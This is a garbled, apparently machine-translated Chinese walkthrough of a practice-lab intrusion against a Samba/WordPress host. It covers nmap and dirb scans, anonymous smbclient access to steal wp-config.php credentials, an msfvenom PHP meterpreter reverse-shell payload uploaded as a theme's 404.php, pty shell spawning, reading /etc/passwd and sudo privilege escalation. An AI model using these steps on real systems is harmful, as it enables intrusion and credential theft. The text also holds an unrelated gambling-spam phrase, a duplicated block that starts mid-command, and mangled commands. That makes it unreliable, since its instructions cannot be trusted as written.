另一方面,SMB介绍1.SMB (服务器块)通信协议是微软(微软)和英特尔(英特尔)于1987年制定的协议,主要作为微软网络的通信协议成为sammb的2. SMB协议基于TCP—NETBIOS,常用端口为139,4453. SMB协议,计算机访问网络资源并支持相应的资源缓冲区二、挖掘信息探测nmap -sV IP开放服务信息
nmap -A -v -T4 IP钻井靶场所有信息
使用nmap扫描端口时,结果如下:
简单扫描开放端口
挖掘靶场的所有信息
三、分析探测结果1 .分析SMB协议的弱点对SMB协议使用空密码,尝试使用弱密码登录,获取相关敏感文件(如config、passwd、admin、robot.)
smbclient‘\ 192.168.253.20 $ share’
下载get(WP_config.PHP )机密文件(**
searchsploit samba分析中小企业协议远程溢出漏洞
四.开始渗透1 .试着用空密码或弱密码连接
这里没有太多密码策略限制。 可以用空密码和弱密码登录。 注意到有三个共享文件夹,并且每次访问一个,在share共享文件夹中会有很大的收获
查看下载的内容
在deets.txt和wp-config.php上找到了密码。 然后,他发现有MySQL数据库的用户名和密码,并注意到探测信息中有3306端口是开放的。 这时,我们可以远程连接3306去一波
很明显,尽管自己知道MySQL数据库的用户名和密码,但人们仍然有点后悔在服务器上拒绝远程登录,继续往下走。 我们可以尝试用ssh服务登录一次
访问被直接拒绝
使用dirb nikto探测器分析HTTP协议的弱点,浏览器访问网站; 找到断点,目标登录后台,然后上传webshell 3。 使用dirb扫描工具扫描隐藏文件目录的结果如下
)1)找到关键字admin后,请尝试打开网站
2.webshellmsfvenom—pphp/meter preter/reverse _ tcpl host=攻击机IP地址lport=4444-fraw/root/desktop/shell.PHP
3.MSF拦截
上传webshell (1)使用找到的敏感信息登录系统后台,上传webshell。 运行webshell (访问包含webshell的PHP页面)2)受到排斥的shellWordPress上传点theme 404.php
运行命令:http://192.168.253.20/WordPress/WP-content/themes/twentyfourteeen/404.PHP
查找flag信息优化终端: python -c ‘import pty; PTY.spawn(/tmdj/bash ) )。
id显示,目录
查找用户名: cat /etc/passwd
查找密码:在共享目录下的敏感文件中提高权限
su用户名sudo -lsu sudo显示根目录中的标志值
对于打开139端口和445端口的计算机,必须注意是否可以直接使用smbclient登录到共享目录并搜索敏感文件
快三大小单双稳赚买法t=4444-fraw/root/desktop/shell.PHP
3.MSF拦截
上传webshell (1)使用找到的敏感信息登录系统后台,上传webshell。 运行webshell (访问包含webshell的PHP页面)2)受到排斥的shellWordPress上传点theme 404.php
运行命令:http://192.168.253.20/WordPress/WP-content/themes/twentyfourteeen/404.PHP
查找flag信息优化终端: python -c ‘import pty; PTY.spawn(/tmdj/bash ) )。
id显示,目录
查找用户名: cat /etc/passwd
查找密码:在共享目录下的敏感文件中提高权限
su用户名sudo -lsu sudo显示根目录中的标志值
对于打开139端口和445端口的计算机,必须注意是否可以直接使用smbclient登录到共享目录并搜索敏感文件